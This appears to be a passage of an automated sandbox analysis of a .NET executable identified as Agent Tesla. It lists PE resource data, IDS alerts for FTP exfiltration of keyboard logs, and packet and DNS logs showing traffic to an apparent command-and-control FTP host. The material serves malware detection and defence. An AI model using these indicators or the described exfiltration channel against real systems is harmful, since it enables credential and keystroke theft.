                                                                                                          .rsrc0xb20000x29a100x29c00becf5ece246b74c13e56ecefb4442bc2False0.6746935815868264data7.095519563194689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0xdc0000xc0x200941bca6cbe8b51c35da808d8e83e02d7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0xb22200x10d8bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9989130907351854
                                                                                                          RT_ICON0xc2fac0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.42335561339169525
                                                                                                          RT_ICON0xd37d40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.5058455361360416
                                                                                                          RT_ICON0xd79fc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.5346473029045643
                                                                                                          RT_ICON0xd9fa40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6055347091932458
                                                                                                          RT_ICON0xdb04c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7225177304964538
                                                                                                          RT_GROUP_ICON0xdb4b40x5aTarga image data - Map 65536 x 3467 x 10.7333333333333333
                                                                                                          RT_VERSION0xdb5100x314data0.43274111675126903
                                                                                                          RT_MANIFEST0xdb8240x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-11T08:34:18.247210+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449747192.254.225.13621TCP
                                                                                                          2025-01-11T08:34:18.709427+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449748192.254.225.13649190TCP
                                                                                                          2025-01-11T08:34:18.715270+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449748192.254.225.13649190TCP
                                                                                                          2025-01-11T08:34:25.740138+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449752192.254.225.13621TCP
                                                                                                          2025-01-11T08:34:26.210410+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449753192.254.225.13645445TCP
                                                                                                          2025-01-11T08:34:26.217704+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449753192.254.225.13645445TCP
                                                                                                          2025-01-11T08:35:33.826452+01001800007Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs1192.168.2.454658192.254.225.13631555TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 11, 2025 08:33:58.715464115 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:58.715528011 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:58.715584993 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:58.730299950 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:58.730319023 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.220254898 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.220324993 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:59.224868059 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:59.224888086 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.225229025 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.267416954 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:59.294862032 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:59.335361004 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.404077053 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.404144049 CET44349732104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:33:59.404192924 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:33:59.414855957 CET49732443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:00.712846041 CET4973421192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:00.717722893 CET2149734192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:00.718102932 CET4973421192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:00.722702026 CET4973421192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:00.727500916 CET2149734192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:00.728343964 CET4973421192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:00.750329971 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:00.755173922 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:00.755595922 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:01.299359083 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.301261902 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:01.306231976 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.449145079 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.452816963 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:01.457737923 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.719630003 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.724349976 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:01.729327917 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.872483015 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:01.873909950 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:01.878820896 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.022032976 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.022197962 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.027097940 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.170084000 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.170425892 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.175399065 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.318458080 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.319071054 CET4973743947192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.323931932 CET4394749737192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.324016094 CET4973743947192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.324115992 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.328921080 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.792187929 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.792481899 CET4973743947192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.792592049 CET4973743947192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.797485113 CET4394749737192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.797501087 CET4394749737192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.797508955 CET4394749737192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.797739983 CET4394749737192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.797797918 CET4973743947192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.904354095 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.940927029 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:02.941337109 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:02.946182013 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.089545965 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.090028048 CET4973939651192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:03.094974041 CET3965149739192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.095050097 CET4973939651192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:03.095156908 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:03.100011110 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.566484928 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.567408085 CET4973939651192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:03.572557926 CET3965149739192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.572613001 CET4973939651192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:03.611149073 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:03.715665102 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:03.767384052 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:15.384695053 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.384728909 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:15.385318041 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.388699055 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.388717890 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:15.867474079 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:15.867584944 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.869693041 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.869699955 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:15.870057106 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:15.923568010 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.942472935 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:15.987330914 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:16.050549030 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:16.050683975 CET44349746104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:16.050744057 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:16.054075956 CET49746443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:16.706573963 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:16.711597919 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:16.711679935 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:17.249368906 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.249723911 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:17.254683018 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.395706892 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.395988941 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:17.400856018 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.636948109 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.649594069 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:17.655086040 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.795767069 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.797269106 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:17.804136038 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.945301056 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:17.946938992 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:17.951834917 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.094849110 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.094991922 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.099802971 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.241627932 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.242228031 CET4974849190192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.247081995 CET4919049748192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.247148037 CET4974849190192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.247210026 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.252064943 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.709141970 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.709427118 CET4974849190192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.709541082 CET4974849190192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.714322090 CET4919049748192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.715209007 CET4919049748192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.715270042 CET4974849190192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.751765013 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.857029915 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:18.879103899 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:18.884284973 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.025227070 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.025774002 CET4974943815192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.030656099 CET4381549749192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.034284115 CET4974943815192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.034404993 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.039242029 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.495796919 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.496077061 CET4974943815192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.496078014 CET4974943815192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.501017094 CET4381549749192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.501055002 CET4381549749192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.501066923 CET4381549749192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.501378059 CET4381549749192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.501435041 CET4974943815192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.548777103 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.643299103 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.643683910 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.648622990 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.790035009 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.790414095 CET4975032215192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.795389891 CET3221549750192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:19.795460939 CET4975032215192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.795526028 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:19.800327063 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:20.258364916 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:20.266056061 CET4975032215192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:20.271122932 CET3221549750192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:20.271182060 CET4975032215192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:20.298604012 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:20.412659883 CET2149747192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:20.454828978 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:22.950107098 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:22.950186014 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:22.954231024 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:23.034586906 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:23.034619093 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.493911982 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.493982077 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:23.499002934 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:23.499015093 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.499514103 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.545309067 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:23.587342024 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.653721094 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.653824091 CET44349751104.26.13.205192.168.2.4
                                                                                                          Jan 11, 2025 08:34:23.654030085 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:23.658977032 CET49751443192.168.2.4104.26.13.205
                                                                                                          Jan 11, 2025 08:34:24.167604923 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:24.172482014 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:24.172549963 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:24.358439922 CET4974721192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:24.729182005 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:24.730343103 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:24.735176086 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:24.879705906 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:24.879857063 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:24.885241032 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.136733055 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.136862040 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.141685963 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.286025047 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.286140919 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.290977001 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.435256958 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.435436010 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.440283060 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.584865093 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.585024118 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.589876890 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.734584093 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.735038996 CET4975345445192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.739980936 CET4544549753192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:25.740138054 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.740166903 CET4975345445192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:25.744998932 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.209619999 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.210410118 CET4975345445192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.210410118 CET4975345445192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.215388060 CET4544549753192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.215651035 CET4544549753192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.217704058 CET4975345445192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.251666069 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.360286951 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.382117033 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.387064934 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.531615019 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.532316923 CET4975442796192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.537197113 CET4279649754192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:26.537722111 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.537729979 CET4975442796192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:26.542505980 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.002496958 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.002860069 CET4975442796192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.002860069 CET4975442796192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.007705927 CET4279649754192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.007759094 CET4279649754192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.007767916 CET4279649754192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.008028030 CET4279649754192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.008095980 CET4975442796192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.048701048 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.152502060 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.153107882 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.157948971 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.302397013 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.302784920 CET4975549582192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.307641983 CET4958249755192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.307703018 CET4975549582192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.307771921 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.312608004 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.772250891 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.772536039 CET4975549582192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.777546883 CET4958249755192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.777698994 CET4975549582192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.814271927 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:27.922419071 CET2149752192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:34:27.970412970 CET4975221192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:34:36.138953924 CET5438953192.168.2.4162.159.36.2
                                                                                                          Jan 11, 2025 08:34:36.144156933 CET5354389162.159.36.2192.168.2.4
                                                                                                          Jan 11, 2025 08:34:36.144270897 CET5438953192.168.2.4162.159.36.2
                                                                                                          Jan 11, 2025 08:34:36.149328947 CET5354389162.159.36.2192.168.2.4
                                                                                                          Jan 11, 2025 08:34:36.590698004 CET5438953192.168.2.4162.159.36.2
                                                                                                          Jan 11, 2025 08:34:36.596427917 CET5354389162.159.36.2192.168.2.4
                                                                                                          Jan 11, 2025 08:34:36.596486092 CET5438953192.168.2.4162.159.36.2
                                                                                                          Jan 11, 2025 08:35:33.028836966 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.033878088 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.176716089 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.177316904 CET5465831555192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.182154894 CET3155554658192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.182224035 CET5465831555192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.182332039 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.187093019 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.820887089 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.821090937 CET5465831555192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.821134090 CET5465831555192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.825984001 CET3155554658192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.826271057 CET3155554658192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:33.826452017 CET5465831555192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.864468098 CET4973521192.168.2.4192.254.225.136
                                                                                                          Jan 11, 2025 08:35:33.969130039 CET2149735192.254.225.136192.168.2.4
                                                                                                          Jan 11, 2025 08:35:34.017190933 CET4973521192.168.2.4192.254.225.136
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 11, 2025 08:33:58.580775976 CET6376253192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 08:33:58.628747940 CET53637621.1.1.1192.168.2.4
                                                                                                          Jan 11, 2025 08:34:00.288131952 CET5622453192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 08:34:00.709427118 CET53562241.1.1.1192.168.2.4
                                                                                                          Jan 11, 2025 08:34:36.138415098 CET5353558162.159.36.2192.168.2.4
                                                                                                          Jan 11, 2025 08:34:36.607333899 CET53514131.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 11, 2025 08:33:58.580775976 CET192.168.2.41.1.1.10xb791Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 08:34:00.288131952 CET192.168.2.41.1.1.10xe4dStandard query (0)ftp.ercolina-usa.comA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 11, 2025 08:33:58.628747940 CET1.1.1.1192.168.2.40xb791No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 08:33:58.628747940 CET1.1.1.1192.168.2.40xb791No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 08:33:58.628747940 CET1.1.1.1192.168.2.40xb791No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
